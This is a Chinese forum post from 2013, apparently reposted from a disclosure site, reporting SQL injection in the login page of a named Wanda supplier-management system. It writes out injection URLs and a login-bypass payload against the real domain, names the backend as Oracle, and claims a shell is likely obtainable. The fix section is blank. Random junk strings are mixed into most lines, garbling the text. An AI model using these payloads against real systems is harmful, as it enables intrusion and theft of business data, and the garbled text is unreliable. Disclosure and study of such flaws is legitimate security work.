找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2577|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。
1 l+ c5 Q& \7 N" y: g) c详细说明:
( X5 ^, l: H9 w# `/ _8 \5 [万达scm系统登陆框sql注入。
! E  M& R' X+ C* a8 J. R; m6 u" q! S. L( H
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27* h* X/ T) q; w9 j+ v" U
7 H: x& I& R+ v' s# q
( p) X% S3 m6 a
500错误。( k! e( w3 [! a2 Z7 b
. F4 a* ]! K; e& \; n4 g% K
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
. z# b2 S2 k8 j0 F4 Mhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
) g* _: }( G3 z7 n; @: l截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
4 k- ]% q/ V% c经过分析,登陆验证的过程应该是:0 H4 e5 f+ ?: O. I, a
) T) ?" I2 d: A. {( q  Y' z  ~
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。' G/ a5 U% Q% P/ R) A9 ^7 a2 v3 t
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png; |8 F/ e# {1 u! V$ V

* C' g0 I# l2 |( j- roracle数据库,存在注入点。@大连万达,你怎么看?7 x  L" M/ o* T. ^
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
: a) {+ D) w4 `- |( E& k; s# }) W
; @1 g+ \9 w; c) F" p系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。  s: `" t; j3 u( L- R1 ?
漏洞证明:, z, H0 T' V; N1 s0 Z% H+ d% [$ n% ~7 x
万达scm系统登陆框sql注入。* b& \7 a) k# }4 ^8 V# s$ u
/ d% Z8 w! B8 I  l4 B$ A3 Q" W
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27+ `# Q3 N$ U$ w% m6 ~6 w
1 s# V  B% D3 @

/ {5 A( \* G7 L+ R; a+ u) p* Z500错误。
( m5 b/ m" O0 I9 D3 o2 ?' }/ {3 u7 d# h
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
: X# [, S; ?, Q+ D3 C* g# Hhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
; g, c1 e; P& l1 n8 a3 J0 E, t! R+ u4 u& C
2 C2 }+ Y# R9 w( e
(截图有一点问题)
. L- Z* v& k) K/ Z8 a3 Y' F, Q; Q
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:, @7 a2 C$ r, r& c

0 M; H, R% Z' o$ u取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。; x9 N* @) q& s
4 y3 }% Y8 K: g9 p
绕过:6 S% w5 k. d% o7 k5 h) |2 r
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
# J$ ?/ t, y. }4 |1 b% W& `1 D( J: v
; ]' l* s7 W4 F- s& D; d( v  G8 V- p: {: @# G. A. g
oracle数据库,存在注入点。@大连万达,你怎么看?8 L% ?) O% y5 K2 M7 Z/ j
​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
$ x/ z* S; [! g  d
1 A- d  u4 W% C修复方案:
( E% B0 H4 n% S。。。
' H4 V# {( H% Q3 K; l/ ^) U1 l% D4 }- q2 w1 d

4 ~: f, b+ J1 Q. {) F) V% Y. K厂商已经确认- h, H" T6 X0 m5 W. X

/ l" u. z8 d2 \! s( b* m[/td][/tr]
! t) g5 |) Y6 Y/ C9 j' \2 O) R[/table]
) m0 v2 `. S3 e7 p3 ]# o1 X& S# q4 j6 U

$ u8 c: B  @' c1 [7 T( Q3 ]- U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表